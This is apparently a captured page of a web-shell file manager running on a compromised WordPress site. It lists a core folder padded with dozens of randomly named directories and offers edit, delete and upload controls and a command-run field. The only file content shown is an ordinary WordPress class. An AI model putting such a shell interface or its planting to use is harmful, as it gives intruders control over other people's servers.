/
home
/
vianto5
/
realtylifestyleproperties.mx
/
wp-includes
/
html-api
/
/home/vianto5/realtylifestyleproperties.mx/wp-includes/html-api
mkdir
upload
Name
Size
Mode
Actions
1kuazmw/
-
0755
rm
1prhbvy/
-
0755
rm
1shmerq/
-
0755
rm
1ufjmwc/
-
0755
rm
anbtzky/
-
0755
rm
atzwqlu/
-
0755
rm
bdtlzxn/
-
0755
rm
bflownd/
-
0755
rm
cqnikyg/
-
0755
rm
ctflkjs/
-
0755
rm
cwiftxg/
-
0755
rm
cwqeg1k/
-
0755
rm
dkjyaqo/
-
0755
rm
dtvoibc/
-
0755
rm
dv1iarb/
-
0755
rm
eizuogm/
-
0755
rm
emqbjwu/
-
0755
rm
eprnvfy/
-
0755
rm
ertvlo1/
-
0755
rm
fhtujyg/
-
0755
rm
fplbkur/
-
0755
rm
fspmcvd/
-
0755
rm
grmdnya/
-
0755
rm
gxipsny/
-
0755
rm
h1yxfzq/
-
0755
rm
hajmyf1/
-
0755
rm
hoiuyaq/
-
0755
rm
hwmltef/
-
0755
rm
ildexfn/
-
0755
rm
iqbxugd/
-
0755
rm
isgqmla/
-
0755
rm
izoalgv/
-
0755
rm
j1pekbm/
-
0755
rm
j1zfpml/
-
0755
rm
jan1fow/
-
0755
rm
jtwrybe/
-
0755
rm
kgbodev/
-
0755
rm
kozifra/
-
0755
rm
kvgeqls/
-
0755
rm
kwzjxqd/
-
0755
rm
mkacjuh/
-
0755
rm
mnzsadx/
-
0755
rm
norehlv/
-
0755
rm
nqohszj/
-
0755
rm
oaxbkhs/
-
0755
rm
ocnkjxy/
-
0755
rm
oq1hskg/
-
0755
rm
plsxudy/
-
0755
rm
pxmwqbn/
-
0755
rm
qdmivuy/
-
0755
rm
qjudipv/
-
0755
rm
qkbiup1/
-
0755
rm
qoefylh/
-
0755
rm
rfxldgb/
-
0755
rm
rlseqjb/
-
0755
rm
rshwxgt/
-
0755
rm
rzlejpq/
-
0755
rm
tmzrxnd/
-
0755
rm
tvxr1dw/
-
0755
rm
twvynzb/
-
0755
rm
ulcmrgp/
-
0755
rm
uqnmvbg/
-
0755
rm
uwxmlgs/
-
0755
rm
vrotupi/
-
0755
rm
wcrexht/
-
0755
rm
wofnqji/
-
0755
rm
wptxuc1/
-
0755
rm
wr1bgfj/
-
0755
rm
wthnizp/
-
0755
rm
wyzuito/
-
0755
rm
ydkwueq/
-
0755
rm
yem1hvn/
-
0755
rm
yphsixg/
-
0755
rm
yrozfxt/
-
0755
rm
yxczi1k/
-
0755
rm
zgewcbh/
-
0755
rm
ztfsycl/
-
0755
rm
zyksxvd/
-
0755
rm
.htaccess
178
0644
edit
dl
rm
class-wp-html-active-formatting-elements.php
7264
0644
edit
dl
rm
class-wp-html-attribute-token.php
2775
0644
edit
dl
rm
class-wp-html-decoder.php
16692
0644
edit
dl
rm
class-wp-html-doctype-info.php
25357
0644
edit
dl
rm
class-wp-html-open-elements.php
22478
0644
edit
dl
rm
class-wp-html-processor-state.php
11335
0644
edit
dl
rm
class-wp-html-processor.php
212203
0644
edit
dl
rm
class-wp-html-span.php
1099
0644
edit
dl
rm
class-wp-html-stack-event.php
1639
0644
edit
dl
rm
class-wp-html-tag-processor.php
146932
0644
edit
dl
rm
class-wp-html-text-replacement.php
1409
0644
edit
dl
rm
class-wp-html-token.php
3410
0644
edit
dl
rm
class-wp-html-unsupported-exception.php
3606
0644
edit
dl
rm
html5-named-character-references.php
80163
0644
edit
dl
rm
Edit:
/home/vianto5/realtylifestyleproperties.mx/wp-includes/html-api/class-wp-html-span.php
(1099B)
<?php /** * HTML API: WP_HTML_Span class * * @package WordPress * @subpackage HTML-API * @since 6.2.0 */ /** * Core class used by the HTML tag processor to represent a textual span * inside an HTML document. * * This is a two-tuple in disguise, used to avoid the memory overhead * involved in using an array for the same purpose. * * This class is for internal usage of the WP_HTML_Tag_Processor class. * * @access private * @since 6.2.0 * @since 6.5.0 Replaced `end` with `length` to more closely align with `substr()`. * * @see WP_HTML_Tag_Processor */ class WP_HTML_Span { /** * Byte offset into document where span begins. * * @since 6.2.0 * * @var int */ public $start; /** * Byte length of this span. * * @since 6.5.0 * * @var int */ public $length; /** * Constructor. * * @since 6.2.0 * * @param int $start Byte offset into document where replacement span begins. * @param int $length Byte length of span. */ public function __construct( int $start, int $length ) { $this->start = $start; $this->length = $length; } }
Save
cmd:
run